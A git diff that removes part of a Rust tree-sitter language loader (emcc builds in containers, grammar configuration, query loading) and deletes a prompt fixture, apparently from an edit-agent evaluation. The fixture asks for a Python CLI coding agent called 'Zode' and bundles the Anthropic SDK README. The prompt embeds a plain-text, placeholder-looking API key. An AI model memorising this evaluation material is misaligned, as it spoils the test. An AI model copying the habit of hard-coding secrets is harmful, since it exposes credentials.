Command::new("podman"), - EmccSource::Native => unreachable!(), - }; - command.args(["run", "--rm"]); - - // The working directory is the directory containing the parser itself - let workdir = if root_path == src_path { - PathBuf::from("/src") - } else { - let mut path = PathBuf::from("/src"); - path.push(src_path.strip_prefix(root_path).unwrap()); - path - }; - command.args(["--workdir", &workdir.to_slash_lossy()]); - - // Mount the root directory as a volume, which is the repo root - let mut volume_string = OsString::from(&root_path); - volume_string.push(":/src:Z"); - command.args([OsStr::new("--volume"), &volume_string]); - - // In case `docker` is an alias to `podman`, ensure that podman - // mounts the current directory as writable by the container - // user which has the same uid as the host user. Setting the - // podman-specific variable is more reliable than attempting to - // detect whether `docker` is an alias for `podman`. - // see https://docs.podman.io/en/latest/markdown/podman-run.1.html#userns-mode - command.env("PODMAN_USERNS", "keep-id"); - - // Get the current user id so that files created in the docker container will have - // the same owner. 
- #[cfg(unix)] - { - #[link(name = "c")] - extern "C" { - fn getuid() -> u32; - } - // don't need to set user for podman since PODMAN_USERNS=keep-id is already set - if source == EmccSource::Docker { - let user_id = unsafe { getuid() }; - command.args(["--user", &user_id.to_string()]); - } - }; - - // Run `emcc` in a container using the `emscripten-slim` image - command.args([EMSCRIPTEN_TAG, "emcc"]); - command - } - }; - - let output_name = "output.wasm"; - - command.args([ - "-o", - output_name, - "-Os", - "-s", - "WASM=1", - "-s", - "SIDE_MODULE=2", - "-s", - "TOTAL_MEMORY=33554432", - "-s", - "NODEJS_CATCH_EXIT=0", - "-s", - &format!("EXPORTED_FUNCTIONS=[\"_tree_sitter_{language_name}\"]"), - "-fno-exceptions", - "-fvisibility=hidden", - "-I", - ".", - ]); - - if let Some(scanner_filename) = scanner_filename { - command.arg(scanner_filename); - } - - command.arg("parser.c"); - let status = command - .spawn() - .with_context(|| "Failed to run emcc command")? - .wait()?; - anyhow::ensure!(status.success(), "emcc command failed"); - let source_path = src_path.join(output_name); - fs::rename(&source_path, &output_path).with_context(|| { - format!("failed to rename wasm output file from {source_path:?} to {output_path:?}") - })?; - - Ok(()) - } - - #[must_use] - #[cfg(feature = "tree-sitter-highlight")] - pub fn highlight_config_for_injection_string<'a>( - &'a self, - string: &str, - ) -> Option<&'a HighlightConfiguration> { - match self.language_configuration_for_injection_string(string) { - Err(e) => { - eprintln!("Failed to load language for injection string '{string}': {e}",); - None - } - Ok(None) => None, - Ok(Some((language, configuration))) => { - match configuration.highlight_config(language, None) { - Err(e) => { - eprintln!( - "Failed to load property sheet for injection string '{string}': {e}", - ); - None - } - Ok(None) => None, - Ok(Some(config)) => Some(config), - } - } - } - } - - #[must_use] - pub fn get_language_configuration_in_current_path(&self) 
-> Option<&LanguageConfiguration> { - self.language_configuration_in_current_path - .map(|i| &self.language_configurations[i]) - } - - pub fn find_language_configurations_at_path( - &mut self, - parser_path: &Path, - set_current_path_config: bool, - ) -> Result<&[LanguageConfiguration]> { - let initial_language_configuration_count = self.language_configurations.len(); - - let ts_json = TreeSitterJSON::from_file(parser_path); - if let Ok(config) = ts_json { - let language_count = self.languages_by_id.len(); - for grammar in config.grammars { - // Determine the path to the parser directory. This can be specified in - // the tree-sitter.json, but defaults to the directory containing the - // tree-sitter.json. - let language_path = parser_path.join(grammar.path.unwrap_or(PathBuf::from("."))); - - // Determine if a previous language configuration in this package.json file - // already uses the same language. - let mut language_id = None; - for (id, (path, _, _)) in - self.languages_by_id.iter().enumerate().skip(language_count) - { - if language_path == *path { - language_id = Some(id); - } - } - - // If not, add a new language path to the list. 
- let language_id = if let Some(language_id) = language_id { - language_id - } else { - self.languages_by_id.push(( - language_path, - OnceCell::new(), - grammar.external_files.clone().into_vec().map(|files| { - files.into_iter() - .map(|path| { - let path = parser_path.join(path); - // prevent p being above/outside of parser_path - anyhow::ensure!(path.starts_with(parser_path), "External file path {path:?} is outside of parser directory {parser_path:?}"); - Ok(path) - }) - .collect::>>() - }).transpose()?, - )); - self.languages_by_id.len() - 1 - }; - - let configuration = LanguageConfiguration { - root_path: parser_path.to_path_buf(), - language_name: grammar.name, - scope: Some(grammar.scope), - language_id, - file_types: grammar.file_types.unwrap_or_default(), - content_regex: Self::regex(grammar.content_regex.as_deref()), - first_line_regex: Self::regex(grammar.first_line_regex.as_deref()), - injection_regex: Self::regex(grammar.injection_regex.as_deref()), - injections_filenames: grammar.injections.into_vec(), - locals_filenames: grammar.locals.into_vec(), - tags_filenames: grammar.tags.into_vec(), - highlights_filenames: grammar.highlights.into_vec(), - #[cfg(feature = "tree-sitter-highlight")] - highlight_config: OnceCell::new(), - #[cfg(feature = "tree-sitter-tags")] - tags_config: OnceCell::new(), - #[cfg(feature = "tree-sitter-highlight")] - highlight_names: &self.highlight_names, - #[cfg(feature = "tree-sitter-highlight")] - use_all_highlight_names: self.use_all_highlight_names, - }; - - for file_type in &configuration.file_types { - self.language_configuration_ids_by_file_type - .entry(file_type.to_string()) - .or_default() - .push(self.language_configurations.len()); - } - if let Some(first_line_regex) = &configuration.first_line_regex { - self.language_configuration_ids_by_first_line_regex - .entry(first_line_regex.to_string()) - .or_default() - .push(self.language_configurations.len()); - } - - self.language_configurations.push(unsafe { - 
mem::transmute::, LanguageConfiguration<'static>>( - configuration, - ) - }); - - if set_current_path_config && self.language_configuration_in_current_path.is_none() - { - self.language_configuration_in_current_path = - Some(self.language_configurations.len() - 1); - } - } - } else if let Err(e) = ts_json { - match e.downcast_ref::() { - // This is noisy, and not really an issue. - Some(e) if e.kind() == std::io::ErrorKind::NotFound => {} - _ => { - eprintln!( - "Warning: Failed to parse {} -- {e}", - parser_path.join("tree-sitter.json").display() - ); - } - } - } - - // If we didn't find any language configurations in the tree-sitter.json file, - // but there is a grammar.json file, then use the grammar file to form a simple - // language configuration. - if self.language_configurations.len() == initial_language_configuration_count - && parser_path.join("src").join("grammar.json").exists() - { - let grammar_path = parser_path.join("src").join("grammar.json"); - let language_name = Self::grammar_json_name(&grammar_path)?; - let configuration = LanguageConfiguration { - root_path: parser_path.to_owned(), - language_name, - language_id: self.languages_by_id.len(), - file_types: Vec::new(), - scope: None, - content_regex: None, - first_line_regex: None, - injection_regex: None, - injections_filenames: None, - locals_filenames: None, - highlights_filenames: None, - tags_filenames: None, - #[cfg(feature = "tree-sitter-highlight")] - highlight_config: OnceCell::new(), - #[cfg(feature = "tree-sitter-tags")] - tags_config: OnceCell::new(), - #[cfg(feature = "tree-sitter-highlight")] - highlight_names: &self.highlight_names, - #[cfg(feature = "tree-sitter-highlight")] - use_all_highlight_names: self.use_all_highlight_names, - }; - self.language_configurations.push(unsafe { - mem::transmute::, LanguageConfiguration<'static>>( - configuration, - ) - }); - self.languages_by_id - .push((parser_path.to_owned(), OnceCell::new(), None)); - } - - 
Ok(&self.language_configurations[initial_language_configuration_count..]) - } - - fn regex(pattern: Option<&str>) -> Option { - pattern.and_then(|r| RegexBuilder::new(r).multi_line(true).build().ok()) - } - - fn grammar_json_name(grammar_path: &Path) -> Result { - let file = fs::File::open(grammar_path).with_context(|| { - format!("Failed to open grammar.json at {}", grammar_path.display()) - })?; - - let first_three_lines = BufReader::new(file) - .lines() - .take(3) - .collect::, _>>() - .with_context(|| { - format!( - "Failed to read the first three lines of grammar.json at {}", - grammar_path.display() - ) - })? - .join("\n"); - - let name = GRAMMAR_NAME_REGEX - .captures(&first_three_lines) - .and_then(|c| c.get(1)) - .with_context(|| { - format!("Failed to parse the language name from grammar.json at {grammar_path:?}") - })?; - - Ok(name.as_str().to_string()) - } - - pub fn select_language( - &mut self, - path: &Path, - current_dir: &Path, - scope: Option<&str>, - ) -> Result { - if let Some(scope) = scope { - if let Some(config) = self - .language_configuration_for_scope(scope) - .with_context(|| format!("Failed to load language for scope '{scope}'"))? - { - Ok(config.0) - } else { - anyhow::bail!("Unknown scope '{scope}'") - } - } else if let Some((lang, _)) = self - .language_configuration_for_file_name(path) - .with_context(|| { - format!( - "Failed to load language for file name {}", - path.file_name().unwrap().to_string_lossy() - ) - })? - { - Ok(lang) - } else if let Some(id) = self.language_configuration_in_current_path { - Ok(self.language_for_id(self.language_configurations[id].language_id)?) - } else if let Some(lang) = self - .languages_at_path(current_dir) - .with_context(|| "Failed to load language in current directory")? - .first() - .cloned() - { - Ok(lang.0) - } else if let Some(lang) = self.language_configuration_for_first_line_regex(path)? 
{ - Ok(lang.0) - } else { - anyhow::bail!("No language found"); - } - } - - pub fn debug_build(&mut self, flag: bool) { - self.debug_build = flag; - } - - pub fn sanitize_build(&mut self, flag: bool) { - self.sanitize_build = flag; - } - - pub fn force_rebuild(&mut self, rebuild: bool) { - self.force_rebuild = rebuild; - } - - #[cfg(feature = "wasm")] - #[cfg_attr(docsrs, doc(cfg(feature = "wasm")))] - pub fn use_wasm(&mut self, engine: &tree_sitter::wasmtime::Engine) { - *self.wasm_store.lock().unwrap() = Some(tree_sitter::WasmStore::new(engine).unwrap()); - } - - #[must_use] - pub fn get_scanner_path(&self, src_path: &Path) -> Option { - let path = src_path.join("scanner.c"); - path.exists().then_some(path) - } -} - -impl LanguageConfiguration<'_> { - #[cfg(feature = "tree-sitter-highlight")] - pub fn highlight_config( - &self, - language: Language, - paths: Option<&[PathBuf]>, - ) -> Result> { - let (highlights_filenames, injections_filenames, locals_filenames) = match paths { - Some(paths) => ( - Some( - paths - .iter() - .filter(|p| p.ends_with("highlights.scm")) - .cloned() - .collect::>(), - ), - Some( - paths - .iter() - .filter(|p| p.ends_with("tags.scm")) - .cloned() - .collect::>(), - ), - Some( - paths - .iter() - .filter(|p| p.ends_with("locals.scm")) - .cloned() - .collect::>(), - ), - ), - None => (None, None, None), - }; - self.highlight_config - .get_or_try_init(|| { - let (highlights_query, highlight_ranges) = self.read_queries( - if highlights_filenames.is_some() { - highlights_filenames.as_deref() - } else { - self.highlights_filenames.as_deref() - }, - "highlights.scm", - )?; - let (injections_query, injection_ranges) = self.read_queries( - if injections_filenames.is_some() { - injections_filenames.as_deref() - } else { - self.injections_filenames.as_deref() - }, - "injections.scm", - )?; - let (locals_query, locals_ranges) = self.read_queries( - if locals_filenames.is_some() { - locals_filenames.as_deref() - } else { - 
self.locals_filenames.as_deref() - }, - "locals.scm", - )?; - - if highlights_query.is_empty() { - Ok(None) - } else { - let mut result = HighlightConfiguration::new( - language, - &self.language_name, - &highlights_query, - &injections_query, - &locals_query, - ) - .map_err(|error| match error.kind { - QueryErrorKind::Language => Error::from(error), - _ => { - if error.offset < injections_query.len() { - Self::include_path_in_query_error( - error, - &injection_ranges, - &injections_query, - 0, - ) - } else if error.offset < injections_query.len() + locals_query.len() { - Self::include_path_in_query_error( - error, - &locals_ranges, - &locals_query, - injections_query.len(), - ) - } else { - Self::include_path_in_query_error( - error, - &highlight_ranges, - &highlights_query, - injections_query.len() + locals_query.len(), - ) - } - } - })?; - let mut all_highlight_names = self.highlight_names.lock().unwrap(); - if self.use_all_highlight_names { - for capture_name in result.query.capture_names() { - if !all_highlight_names.iter().any(|x| x == capture_name) { - all_highlight_names.push((*capture_name).to_string()); - } - } - } - result.configure(all_highlight_names.as_slice()); - drop(all_highlight_names); - Ok(Some(result)) - } - }) - .map(Option::as_ref) - } - - #[cfg(feature = "tree-sitter-tags")] - pub fn tags_config(&self, language: Language) -> Result> { - self.tags_config - .get_or_try_init(|| { - let (tags_query, tags_ranges) = - self.read_queries(self.tags_filenames.as_deref(), "tags.scm")?; - let (locals_query, locals_ranges) = - self.read_queries(self.locals_filenames.as_deref(), "locals.scm")?; - if tags_query.is_empty() { - Ok(None) - } else { - TagsConfiguration::new(language, &tags_query, &locals_query) - .map(Some) - .map_err(|error| { - if let TagsError::Query(error) = error { - if error.offset < locals_query.len() { - Self::include_path_in_query_error( - error, - &locals_ranges, - &locals_query, - 0, - ) - } else { - 
Self::include_path_in_query_error( - error, - &tags_ranges, - &tags_query, - locals_query.len(), - ) - } - } else { - error.into() - } - }) - } - }) - .map(Option::as_ref) - } - - #[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] - fn include_path_in_query_error( - mut error: QueryError, - ranges: &[(PathBuf, Range)], - source: &str, - start_offset: usize, - ) -> Error { - let offset_within_section = error.offset - start_offset; - let (path, range) = ranges - .iter() - .find(|(_, range)| range.contains(&offset_within_section)) - .unwrap_or_else(|| ranges.last().unwrap()); - error.offset = offset_within_section - range.start; - error.row = source[range.start..offset_within_section] - .matches('\n') - .count(); - Error::from(error).context(format!("Error in query file {}", path.display())) - } - - #[allow(clippy::type_complexity)] - #[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] - fn read_queries( - &self, - paths: Option<&[PathBuf]>, - default_path: &str, - ) -> Result<(String, Vec<(PathBuf, Range)>)> { - let mut query = String::new(); - let mut path_ranges = Vec::new(); - if let Some(paths) = paths { - for path in paths { - let abs_path = self.root_path.join(path); - let prev_query_len = query.len(); - query += &fs::read_to_string(&abs_path) - .with_context(|| format!("Failed to read query file {}", path.display()))?; - path_ranges.push((path.clone(), prev_query_len..query.len())); - } - } else { - // highlights.scm is needed to test highlights, and tags.scm to test tags - if default_path == "highlights.scm" || default_path == "tags.scm" { - eprintln!( - indoc! {" - Warning: you should add a `{}` entry pointing to the highlights path in the `tree-sitter` object in the grammar's tree-sitter.json file. 
- See more here: https://tree-sitter.github.io/tree-sitter/3-syntax-highlighting#query-paths - "}, - default_path.replace(".scm", "") - ); - } - let queries_path = self.root_path.join("queries"); - let path = queries_path.join(default_path); - if path.exists() { - query = fs::read_to_string(&path) - .with_context(|| format!("Failed to read query file {}", path.display()))?; - path_ranges.push((PathBuf::from(default_path), 0..query.len())); - } - } - - Ok((query, path_ranges)) - } -} - -fn needs_recompile(lib_path: &Path, paths_to_check: &[PathBuf]) -> Result { - if !lib_path.exists() { - return Ok(true); - } - let lib_mtime = mtime(lib_path) - .with_context(|| format!("Failed to read mtime of {}", lib_path.display()))?; - for path in paths_to_check { - if mtime(path)? > lib_mtime { - return Ok(true); - } - } - Ok(false) -} - -fn mtime(path: &Path) -> Result { - Ok(fs::metadata(path)?.modified()?) -} - -fn replace_dashes_with_underscores(name: &str) -> String { - let mut result = String::with_capacity(name.len()); - for c in name.chars() { - if c == '-' { - result.push('_'); - } else { - result.push(c); - } - } - result -} diff --git a/crates/agent/src/edit_agent/evals/fixtures/zode/prompt.md b/crates/agent/src/edit_agent/evals/fixtures/zode/prompt.md deleted file mode 100644 index 29755d441f7a4f..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/zode/prompt.md +++ /dev/null @@ -1,2193 +0,0 @@ -- We're building a CLI code agent tool called Zode that is intended to work like Aider or Claude code -- We're starting from a completely blank project -- Like Aider/Claude Code you take the user's initial prompt and then call the LLM and perform tool calls in a loop until the ultimate goal is achieved. -- Unlike Aider or Claude code, it's not intended to be interactive. Once the initial prompt is passed in, there will be no further input from the user. 
-- The system you will build must reach the stated goal just by performing tool calls and calling the LLM -- I want you to build this in python. Use the anthropic python sdk and the model context protocol sdk. Use a virtual env and pip to install dependencies -- Follow the anthropic guidance on tool calls: https://docs.anthropic.com/en/docs/build-with-claude/tool-use/overview -- Use this Anthropic model: `claude-3-7-sonnet-20250219` -- Use this Anthropic API Key: `sk-ant-api03-qweeryiofdjsncmxquywefidopsugus` -- One of the most important pieces to this is having good tool calls. We will be using the tools provided by the Claude MCP server. You can start this server using `claude mcp serve` and then you will need to write code that acts as an MCP **client** to connect to this mcp server via MCP. Likely you want to start this using a subprocess. The JSON schema showing the tools available via this sdk are available below. Via this MCP server you have access to all the tools that zode needs: Bash, GlobTool, GrepTool, LS, View, Edit, Replace, WebFetchTool -- The cli tool should be invocable via python zode.py file.md where file.md is any possible file that contains the users prompt. As a reminder, there will be no further input from the user after this initial prompt. Zode must take it from there and call the LLM and tools until the user goal is accomplished -- Try and keep all code in zode.py and make heavy use of the asks I mentioned -- Once you’ve implemented this, you must run python zode.py eval/instructions.md to see how well our new agent tool does! - -Anthropic Python SDK README: -``` -# Anthropic Python API library - -[![PyPI version](https://img.shields.io/pypi/v/anthropic.svg)](https://pypi.org/project/anthropic/) - -The Anthropic Python library provides convenient access to the Anthropic REST API from any Python 3.8+ -application. 
It includes type definitions for all request params and response fields, -and offers both synchronous and asynchronous clients powered by [httpx](https://github.com/encode/httpx). - -## Documentation - -The REST API documentation can be found on [docs.anthropic.com](https://docs.anthropic.com/claude/reference/). The full API of this library can be found in [api.md](api.md). - -## Installation - -```sh -# install from PyPI -pip install anthropic -``` - -## Usage - -The full API of this library can be found in [api.md](api.md). - -```python -import os -from anthropic import Anthropic - -client = Anthropic( - api_key=os.environ.get("ANTHROPIC_API_KEY"), # This is the default and can be omitted -) - -message = client.messages.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello, Claude", - } - ], - model="claude-3-5-sonnet-latest", -) -print(message.content) -``` - -While you can provide an `api_key` keyword argument, -we recommend using [python-dotenv](https://pypi.org/project/python-dotenv/) -to add `ANTHROPIC_API_KEY="my-anthropic-api-key"` to your `.env` file -so that your API Key is not stored in source control. - -## Async usage - -Simply import `AsyncAnthropic` instead of `Anthropic` and use `await` with each API call: - -```python -import os -import asyncio -from anthropic import AsyncAnthropic - -client = AsyncAnthropic( - api_key=os.environ.get("ANTHROPIC_API_KEY"), # This is the default and can be omitted -) - - -async def main() -> None: - message = await client.messages.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello, Claude", - } - ], - model="claude-3-5-sonnet-latest", - ) - print(message.content) - - -asyncio.run(main()) -``` - -Functionality between the synchronous and asynchronous clients is otherwise identical. - -## Streaming responses - -We provide support for streaming responses using Server Side Events (SSE). 
- -```python -from anthropic import Anthropic - -client = Anthropic() - -stream = client.messages.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello, Claude", - } - ], - model="claude-3-5-sonnet-latest", - stream=True, -) -for event in stream: - print(event.type) -``` - -The async client uses the exact same interface. - -```python -from anthropic import AsyncAnthropic - -client = AsyncAnthropic() - -stream = await client.messages.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello, Claude", - } - ], - model="claude-3-5-sonnet-latest", - stream=True, -) -async for event in stream: - print(event.type) -``` - -### Streaming Helpers - -This library provides several conveniences for streaming messages, for example: - -```py -import asyncio -from anthropic import AsyncAnthropic - -client = AsyncAnthropic() - -async def main() -> None: - async with client.messages.stream( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Say hello there!", - } - ], - model="claude-3-5-sonnet-latest", - ) as stream: - async for text in stream.text_stream: - print(text, end="", flush=True) - print() - - message = await stream.get_final_message() - print(message.to_json()) - -asyncio.run(main()) -``` - -Streaming with `client.messages.stream(...)` exposes [various helpers for your convenience](helpers.md) including accumulation & SDK-specific events. - -Alternatively, you can use `client.messages.create(..., stream=True)` which only returns an async iterable of the events in the stream and thus uses less memory (it does not build up a final message object for you). - -## Token counting - -To get the token count for a message without creating it you can use the `client.beta.messages.count_tokens()` method. This takes the same `messages` list as the `.create()` method. 
- -```py -count = client.beta.messages.count_tokens( - model="claude-3-5-sonnet-20241022", - messages=[ - {"role": "user", "content": "Hello, world"} - ] -) -count.input_tokens # 10 -``` - -You can also see the exact usage for a given request through the `usage` response property, e.g. - -```py -message = client.messages.create(...) -message.usage -# Usage(input_tokens=25, output_tokens=13) -``` - -## Message Batches - -This SDK provides beta support for the [Message Batches API](https://docs.anthropic.com/en/docs/build-with-claude/message-batches) under the `client.beta.messages.batches` namespace. - - -### Creating a batch - -Message Batches take the exact same request params as the standard Messages API: - -```python -await client.beta.messages.batches.create( - requests=[ - { - "custom_id": "my-first-request", - "params": { - "model": "claude-3-5-sonnet-latest", - "max_tokens": 1024, - "messages": [{"role": "user", "content": "Hello, world"}], - }, - }, - { - "custom_id": "my-second-request", - "params": { - "model": "claude-3-5-sonnet-latest", - "max_tokens": 1024, - "messages": [{"role": "user", "content": "Hi again, friend"}], - }, - }, - ] -) -``` - - -### Getting results from a batch - -Once a Message Batch has been processed, indicated by `.processing_status === 'ended'`, you can access the results with `.batches.results()` - -```python -result_stream = await client.beta.messages.batches.results(batch_id) -async for entry in result_stream: - if entry.result.type == "succeeded": - print(entry.result.message.content) -``` - -## Tool use - -This SDK provides support for tool use, aka function calling. More details can be found in [the documentation](https://docs.anthropic.com/claude/docs/tool-use). - -## AWS Bedrock - -This library also provides support for the [Anthropic Bedrock API](https://aws.amazon.com/bedrock/claude/) if you install this library with the `bedrock` extra, e.g. `pip install -U anthropic[bedrock]`. 
- -You can then import and instantiate a separate `AnthropicBedrock` class, the rest of the API is the same. - -```py -from anthropic import AnthropicBedrock - -client = AnthropicBedrock() - -message = client.messages.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello!", - } - ], - model="anthropic.claude-3-5-sonnet-20241022-v2:0", -) -print(message) -``` - -The bedrock client supports the following arguments for authentication - -```py -AnthropicBedrock( - aws_profile='...', - aws_region='us-east' - aws_secret_key='...', - aws_access_key='...', - aws_session_token='...', -) -``` - -For a more fully fledged example see [`examples/bedrock.py`](https://github.com/anthropics/anthropic-sdk-python/blob/main/examples/bedrock.py). - -## Google Vertex - -This library also provides support for the [Anthropic Vertex API](https://cloud.google.com/vertex-ai?hl=en) if you install this library with the `vertex` extra, e.g. `pip install -U anthropic[vertex]`. - -You can then import and instantiate a separate `AnthropicVertex`/`AsyncAnthropicVertex` class, which has the same API as the base `Anthropic`/`AsyncAnthropic` class. - -```py -from anthropic import AnthropicVertex - -client = AnthropicVertex() - -message = client.messages.create( - model="claude-3-5-sonnet-v2@20241022", - max_tokens=100, - messages=[ - { - "role": "user", - "content": "Hello!", - } - ], -) -print(message) -``` - -For a more complete example see [`examples/vertex.py`](https://github.com/anthropics/anthropic-sdk-python/blob/main/examples/vertex.py). - -## Using types - -Nested request parameters are [TypedDicts](https://docs.python.org/3/library/typing.html#typing.TypedDict). Responses are [Pydantic models](https://docs.pydantic.dev) which also provide helper methods for things like: - -- Serializing back into JSON, `model.to_json()` -- Converting to a dictionary, `model.to_dict()` - -Typed requests and responses provide autocomplete and documentation within your editor. 
If you would like to see type errors in VS Code to help catch bugs earlier, set `python.analysis.typeCheckingMode` to `basic`. - -## Pagination - -List methods in the Anthropic API are paginated. - -This library provides auto-paginating iterators with each list response, so you do not have to request successive pages manually: - -```python -from anthropic import Anthropic - -client = Anthropic() - -all_batches = [] -# Automatically fetches more pages as needed. -for batch in client.beta.messages.batches.list( - limit=20, -): - # Do something with batch here - all_batches.append(batch) -print(all_batches) -``` - -Or, asynchronously: - -```python -import asyncio -from anthropic import AsyncAnthropic - -client = AsyncAnthropic() - - -async def main() -> None: - all_batches = [] - # Iterate through items across all pages, issuing requests as needed. - async for batch in client.beta.messages.batches.list( - limit=20, - ): - all_batches.append(batch) - print(all_batches) - - -asyncio.run(main()) -``` - -Alternatively, you can use the `.has_next_page()`, `.next_page_info()`, or `.get_next_page()` methods for more granular control working with pages: - -```python -first_page = await client.beta.messages.batches.list( - limit=20, -) -if first_page.has_next_page(): - print(f"will fetch next page using these details: {first_page.next_page_info()}") - next_page = await first_page.get_next_page() - print(f"number of items we just fetched: {len(next_page.data)}") - -# Remove `await` for non-async usage. -``` - -Or just work directly with the returned data: - -```python -first_page = await client.beta.messages.batches.list( - limit=20, -) - -print(f"next page cursor: {first_page.last_id}") # => "next page cursor: ..." -for batch in first_page.data: - print(batch.id) - -# Remove `await` for non-async usage. 
-``` - -## Handling errors - -When the library is unable to connect to the API (for example, due to network connection problems or a timeout), a subclass of `anthropic.APIConnectionError` is raised. - -When the API returns a non-success status code (that is, 4xx or 5xx -response), a subclass of `anthropic.APIStatusError` is raised, containing `status_code` and `response` properties. - -All errors inherit from `anthropic.APIError`. - -```python -import anthropic -from anthropic import Anthropic - -client = Anthropic() - -try: - client.messages.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello, Claude", - } - ], - model="claude-3-5-sonnet-latest", - ) -except anthropic.APIConnectionError as e: - print("The server could not be reached") - print(e.__cause__) # an underlying Exception, likely raised within httpx. -except anthropic.RateLimitError as e: - print("A 429 status code was received; we should back off a bit.") -except anthropic.APIStatusError as e: - print("Another non-200-range status code was received") - print(e.status_code) - print(e.response) -``` - -Error codes are as follows: - -| Status Code | Error Type | -| ----------- | -------------------------- | -| 400 | `BadRequestError` | -| 401 | `AuthenticationError` | -| 403 | `PermissionDeniedError` | -| 404 | `NotFoundError` | -| 422 | `UnprocessableEntityError` | -| 429 | `RateLimitError` | -| >=500 | `InternalServerError` | -| N/A | `APIConnectionError` | - -## Request IDs - -> For more information on debugging requests, see [these docs](https://docs.anthropic.com/en/api/errors#request-id) - -All object responses in the SDK provide a `_request_id` property which is added from the `request-id` response header so that you can quickly log failing requests and report them back to Anthropic. 
- -```python -message = client.messages.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello, Claude", - } - ], - model="claude-3-5-sonnet-latest", -) -print(message._request_id) # req_018EeWyXxfu5pfWkrYcMdjWG -``` - -Note that unlike other properties that use an `_` prefix, the `_request_id` property -*is* public. Unless documented otherwise, *all* other `_` prefix properties, -methods and modules are *private*. - -### Retries - -Certain errors are automatically retried 2 times by default, with a short exponential backoff. -Connection errors (for example, due to a network connectivity problem), 408 Request Timeout, 409 Conflict, -429 Rate Limit, and >=500 Internal errors are all retried by default. - -You can use the `max_retries` option to configure or disable retry settings: - -```python -from anthropic import Anthropic - -# Configure the default for all requests: -client = Anthropic( - # default is 2 - max_retries=0, -) - -# Or, configure per-request: -client.with_options(max_retries=5).messages.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello, Claude", - } - ], - model="claude-3-5-sonnet-latest", -) -``` - -### Timeouts - -By default requests time out after 10 minutes. You can configure this with a `timeout` option, -which accepts a float or an [`httpx.Timeout`](https://www.python-httpx.org/advanced/timeouts/#fine-tuning-the-configuration) object: - -```python -from anthropic import Anthropic - -# Configure the default for all requests: -client = Anthropic( - # 20 seconds (default is 10 minutes) - timeout=20.0, -) - -# More granular control: -client = Anthropic( - timeout=httpx.Timeout(60.0, read=5.0, write=10.0, connect=2.0), -) - -# Override per-request: -client.with_options(timeout=5.0).messages.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello, Claude", - } - ], - model="claude-3-5-sonnet-latest", -) -``` - -On timeout, an `APITimeoutError` is thrown. 
- -Note that requests that time out are [retried twice by default](#retries). - -### Long Requests - -> [!IMPORTANT] -> We highly encourage you use the streaming [Messages API](#streaming-responses) for longer running requests. - -We do not recommend setting a large `max_tokens` values without using streaming. -Some networks may drop idle connections after a certain period of time, which -can cause the request to fail or [timeout](#timeouts) without receiving a response from Anthropic. - -This SDK will also throw a `ValueError` if a non-streaming request is expected to be above roughly 10 minutes long. -Passing `stream=True` or [overriding](#timeouts) the `timeout` option at the client or request level disables this error. - -An expected request latency longer than the [timeout](#timeouts) for a non-streaming request -will result in the client terminating the connection and retrying without receiving a response. - -We set a [TCP socket keep-alive](https://tldp.org/HOWTO/TCP-Keepalive-HOWTO/overview.html) option in order -to reduce the impact of idle connection timeouts on some networks. -This can be [overridden](#Configuring-the-HTTP-client) by passing a `http_client` option to the client. - -## Default Headers - -We automatically send the `anthropic-version` header set to `2023-06-01`. - -If you need to, you can override it by setting default headers per-request or on the client object. - -Be aware that doing so may result in incorrect types and other unexpected or undefined behavior in the SDK. - -```python -from anthropic import Anthropic - -client = Anthropic( - default_headers={"anthropic-version": "My-Custom-Value"}, -) -``` - -## Advanced - -### Logging - -We use the standard library [`logging`](https://docs.python.org/3/library/logging.html) module. - -You can enable logging by setting the environment variable `ANTHROPIC_LOG` to `info`. - -```shell -$ export ANTHROPIC_LOG=info -``` - -Or to `debug` for more verbose logging. 
- -### How to tell whether `None` means `null` or missing - -In an API response, a field may be explicitly `null`, or missing entirely; in either case, its value is `None` in this library. You can differentiate the two cases with `.model_fields_set`: - -```py -if response.my_field is None: - if 'my_field' not in response.model_fields_set: - print('Got json like {}, without a "my_field" key present at all.') - else: - print('Got json like {"my_field": null}.') -``` - -### Accessing raw response data (e.g. headers) - -The "raw" Response object can be accessed by prefixing `.with_raw_response.` to any HTTP method call, e.g., - -```py -from anthropic import Anthropic - -client = Anthropic() -response = client.messages.with_raw_response.create( - max_tokens=1024, - messages=[{ - "role": "user", - "content": "Hello, Claude", - }], - model="claude-3-5-sonnet-latest", -) -print(response.headers.get('X-My-Header')) - -message = response.parse() # get the object that `messages.create()` would have returned -print(message.content) -``` - -These methods return a [`LegacyAPIResponse`](https://github.com/anthropics/anthropic-sdk-python/tree/main/src/anthropic/_legacy_response.py) object. This is a legacy class as we're changing it slightly in the next major version. - -For the sync client this will mostly be the same with the exception -of `content` & `text` will be methods instead of properties. In the -async client, all methods will be async. - -A migration script will be provided & the migration in general should -be smooth. - -#### `.with_streaming_response` - -The above interface eagerly reads the full response body when you make the request, which may not always be what you want. - -To stream the response body, use `.with_streaming_response` instead, which requires a context manager and only reads the response body once you call `.read()`, `.text()`, `.json()`, `.iter_bytes()`, `.iter_text()`, `.iter_lines()` or `.parse()`. In the async client, these are async methods. 
